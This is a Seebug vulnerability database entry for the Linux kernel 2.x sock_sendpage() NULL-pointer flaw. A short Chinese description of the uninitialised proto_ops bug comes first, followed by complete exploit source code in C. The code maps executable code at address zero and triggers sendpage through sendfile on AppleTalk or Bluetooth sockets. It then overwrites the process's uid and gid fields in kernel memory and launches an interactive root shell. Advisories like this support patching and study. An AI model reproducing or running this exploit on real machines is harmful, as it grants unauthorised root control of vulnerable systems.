Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit

2014-07-01T00:00:00
ID SSV:66808
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

Linux Kernel是开放源码操作系统Linux所使用的内核。<br/>在Linux内核中,每个套接字都有一个名为proto_ops的相关操作结构,其中包含有用于实现各种功能(如接受、绑定、关闭等)的函数指针。如果对特定套接字的操作没有实现,就应将相关的函数指针指向预定义的存根。例如,如果没有定义accept功能,就应指向sock_no_accept()。但是,如果某些指针没有初始化,就可能出现其他情况。例如,sock_sendpage()函数在引用函数指针之前没有执行验证,因此依赖于proto_ops结构的初始化情况。<br/>这个漏洞可能被用于获得本地权限提升。如果要利用这个漏洞,攻击者必须能够在0地址创建包含有将以内核权限执行代码的映射,然后使用以下序列触发有漏洞的操作:<br/>/ ... /<br/> int fdin = mkstemp(template);<br/> int fdout = socket(PF_PPPOX, SOCK_DGRAM, 0);<br/> unlink(template);<br/> ftruncate(fdin, PAGE_SIZE);<br/> sendfile(fdout, fdin, NULL, PAGE_SIZE);<br/>/ ... /<br/>请注意sendfile()只是在套接字中导致sendpage操作的方法之一。<br/>

                                        
                                            
                                                #include &lt;stdio.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;sys/personality.h&gt;
 
unsigned int uid, gid;
 
void kernel_code()
{
    unsigned long where=0;
    unsigned long *pcb_task_struct;
 
    where=(unsigned long )&where;
    where&=~8191;
    pcb_task_struct=(unsigned long *)where;
 
    while(pcb_task_struct){
        if(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&
            pcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&
            pcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&
            pcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){
            pcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;
            pcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;
            break;
        }
        pcb_task_struct++;
    }
    return;
    /*
    ** By calling iret after pushing a register into kernel stack,
    ** We don't have to go back to ring3(user mode) privilege level. dont worry. :-}
    **
    ** kernel_code() function will return to its previous status which means before sendfile() system call,
    ** after operating upon a ring0(kernel mode) privilege level.
    ** This will enhance the viablity of the attack code even though each kernel can have different CS and DS address.
    */
}
void *kernel=kernel_code;
 
int main(int argc,char *argv[])
{
    int fd_in=0,fd_out=0,offset=1;
    void *zero_page;
 
    uid=getuid();
    gid=getgid();
    if(uid==0){
        fprintf(stderr,"[-] check ur uid\n");
        return -1;
    }
 
    /*
    ** There are some cases that we need mprotect due to the dependency matter with SVR4. (however, I did not confirm it yet)
    */
    if(personality(0xffffffff)==PER_SVR4){
        if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
            perror("[-] mprotect()");
            return -1;
        }
    }
    else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
            perror("[-] mmap()");
            return -1;
    }
    *(char *)0x00000000=0xff;
    *(char *)0x00000001=0x25;
    *(unsigned long *)0x00000002=(unsigned long)&kernel;
    *(char *)0x00000006=0xc3;
 
    if((fd_in=open(argv[0],O_RDONLY))==-1){
        perror("[-] open()");
        return -1;
    }
    if((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){
        if((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){
            perror("[-] socket()");
            return -1;
        }
    }
gogossing:
    /*
    ** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,
    ** an attacker can make all the processes runing under current user uid 0.
    */
    if(sendfile(fd_out,fd_in,&offset,2)==-1){
        if(offset==0){
            perror("[-] sendfile()");
            return -1;
        }
        close(fd_out);
        fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);
    }
    if(getuid()==uid){
        if(offset){
            offset=0;
        }
        goto gogossing; /* all process */
    }
    close(fd_in);
    close(fd_out);
 
    execl("/bin/sh","sh","-i",NULL);
    return 0;
}